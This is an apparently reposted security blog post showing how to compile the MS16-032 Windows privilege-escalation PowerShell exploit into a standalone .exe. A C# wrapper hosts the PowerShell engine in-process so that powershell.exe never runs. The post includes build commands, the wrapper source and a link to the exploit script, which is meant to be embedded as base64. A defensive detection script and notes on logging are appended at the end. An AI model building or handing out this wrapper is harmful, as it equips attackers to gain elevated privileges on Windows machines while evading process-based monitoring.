Repost

Compile Your PowerShell (MS16-032 as an Example)

Give a man a fish and you feed him for a day; teach a man to fish and you feed him for a lifetime.

The MS16-032 exploit from before is a PowerShell script. How do you turn it into an .exe? Very simple: use .NET, make a small modification, and compile. The modified code is here:

Click here

The gist seems to be blocked (GFW), so I'll paste it here as well:

/*
 Author: Evilcg, Twitter: @Evilcg

 Step One: find the PowerShell engine assembly
 PS C:\> [psobject].Assembly.Location
 C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

 Step Two: compile against it
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/
// Windows 10 reference may be here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
    class Program
    {
        static string _application;
        static string _commandline;

        static int Main(string[] args)
        {
            if (args.Length == 0)
            {
                Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c calc.exe\"");
                return 1;
            }
            else if (args.Length == 1)
            {
                // Only the application to launch was given.
                _application = args[0];
                PowerShellExecutor t = new PowerShellExecutor();
                t.ExecuteSynchronously(_application, "");
            }
            else if (args.Length == 2)
            {
                // Application plus its command line.
                _application = args[0];
                _commandline = args[1];
                PowerShellExecutor t = new PowerShellExecutor();
                t.ExecuteSynchronously(_application, _commandline);
            }
            return 0;
        }
    }

    class PowerShellExecutor
    {
        // Base64 of the whole Invoke-MS16-032.ps1 script goes inside the quotes (left empty here).
        public static string PSInvoke_MS16_032 =
            System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@""));

        public void ExecuteSynchronously(string application, string commandline)
        {
            string Commandout;

            // Host the PowerShell engine in-process; no powershell.exe is started.
            InitialSessionState iss = InitialSessionState.CreateDefault();
            Runspace rs = RunspaceFactory.CreateRunspace(iss);
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;

            // First script defines Invoke-MS16-032 in the runspace's global scope.
            ps.AddScript(PSInvoke_MS16_032);

            if (commandline != "")
            {
                Commandout = "Invoke-MS16-032 -Application \"" + application + "\" -Commandline " + "\"" + commandline + "\"";
            }
            else
            {
                Commandout = "Invoke-MS16-032 -Application " + application;
            }
            Console.WriteLine(Commandout);

            // Second script calls the function just defined; Out-Default renders its output.
            ps.AddScript(Commandout);
            ps.AddCommand("Out-Default");
            ps.Invoke();
            rs.Close();
        }
    }
}

The base64 content is the base64 encoding of the entire contents of https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 (you can use your own PowerShell script). Since my modified version takes parameters, I wrote the simple C# code above to run the PowerShell through .NET.

Compiling requires System.Management.Automation.dll; the exact steps are written in the comments of the .cs file, so compile it yourselves. I only tested it on my own machine, nothing else. Demo below:

Demo (animated GIF): http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

Running PowerShell through .NET does not require powershell.exe at all. For details, see p0wnedShell (https://github.com/Cn33liz/p0wnedShell) or http://zone.wooyun.org/content/26831
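The consequence for defenders is that watching for powershell.exe is not enough: the engine can be loaded into any .NET process, exactly as the wrapper above does. The following script is an added example, not part of the original post or of any of the linked projects. It walks the process list and reports every process that has the PowerShell engine module loaded but is not one of the expected hosts. It assumes the engine module name matches System.Management.Automation*.dll (covering both the GAC assembly and its native image, System.Management.Automation.ni.dll), that it is run elevated so other users' processes can be inspected, and that the PowerShell running it matches the OS bitness so 64-bit processes can be enumerated; the function and parameter names are my own.

```powershell
# Added example: find processes hosting the PowerShell engine in-process
# without being one of the standard PowerShell hosts.
function Find-UnexpectedPowerShellHost {
    [CmdletBinding()]
    param(
        # Hosts that are expected to load the engine; anything else is reported.
        [string[]]$ExpectedHost = @('powershell', 'powershell_ise', 'pwsh')
    )

    foreach ($proc in Get-Process) {
        if ($ExpectedHost -contains $proc.ProcessName) { continue }

        try {
            $modules = $proc.Modules
        } catch {
            # Access denied or 32/64-bit mismatch: this process cannot be inspected.
            Write-Verbose ("Skipping PID {0} ({1}): {2}" -f $proc.Id, $proc.ProcessName, $_.Exception.Message)
            continue
        }

        # Assumption: the engine shows up as System.Management.Automation.dll or its .ni.dll image.
        $engine = $modules | Where-Object { $_.ModuleName -like 'System.Management.Automation*.dll' }
        if ($engine) {
            [pscustomobject]@{
                ProcessName  = $proc.ProcessName
                Id           = $proc.Id
                Path         = $proc.Path
                EngineModule = ($engine | Select-Object -First 1).FileName
            }
        }
    }
}

# Usage: a compiled wrapper like MS16_032.exe shows up here while it is running,
# because it loads the engine even though powershell.exe never starts.
Find-UnexpectedPowerShellHost -Verbose | Format-Table -AutoSize
```

Use `-Verbose` to see which processes could not be inspected rather than silently assuming they are clean. Note also that PowerShell 5 script block logging is implemented inside the engine assembly, not in powershell.exe, so on a system with that logging enabled the script run by such a host still lands in the PowerShell operational log; the host name recorded there will simply be the custom executable rather than powershell.exe.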

Original: http://evi1cg.me/archives/Compile_Your_Powreshell_Script.html